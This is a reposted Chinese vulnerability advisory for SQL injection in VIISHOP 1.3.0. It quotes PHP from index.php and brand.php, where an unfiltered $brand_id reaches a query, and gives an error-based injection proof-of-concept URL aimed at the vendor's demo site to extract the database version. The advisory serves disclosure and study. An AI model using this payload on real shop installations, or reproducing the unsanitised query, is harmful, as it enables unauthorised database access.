鸿 网 互 联 www.68idc.cn

VIISHOP 1.3.0 SQL注入及修复

来源:互联网 作者:佚名 时间:2016-05-07 10:05
/*******************************************************//* VIISHOP 1.3.0 SQL Injection Vulnerability/* ======================== /* By: : Kn1f3 /* E-Mail : 681796@qq.com/*******************************************************//* Welcome to
/*******************************************************/

/* VIISHOP 1.3.0 SQL Injection Vulnerability

/* ======================== 

/* By: : Kn1f3 

/* E-Mail : 681796@qq.com

/*******************************************************/

/* Welcome to http://www.90sec.com */

/*******************************************************/

//index.php 首页文件


//index.php 首页文件
$GLOBALS['_REQUEST'] = isset( $_REQUEST ) ? $_REQUEST : ""; 
define( "BASEDIR", dirname( __FILE__ ) );
include_once( BASEDIR."/config/db_config.php" );
include_once( BASEDIR."/include/common.inc.php" );
if ( !isset( $_REQUEST['p'] ) )
{
                                $GLOBALS['_REQUEST']['p'] = "index";
}
$inc = str_replace( array( ":", "/", "..", ".", ";", "\\", "http", "ftp" ), "", $_REQUEST['p'] );
$inc = eregi_replace( "[^_a-zA-Z0-9]", "", $inc );
if ( !include( "system/{$inc}.php" ) )  //包含 进行了过滤 查看system目录下文件
{
                                show_msg( "error_once", "index.php" );
}



问题出在brand.php文件中


$brand_list = $db->fetch_array( $db->query( "SELECT * FROM {$prefix}brand WHERE uid = '{$brand_id}'" ) );  //$prefix 和 $brand_id 未初始化没有进行任何过滤就带入查询了



poc: http://demo.viishop.com/index.ph ... 28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28select%20version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29 

 



 
修复方案:

推荐80sec 的防注入代码 哈哈哈哈 
 
网友评论
<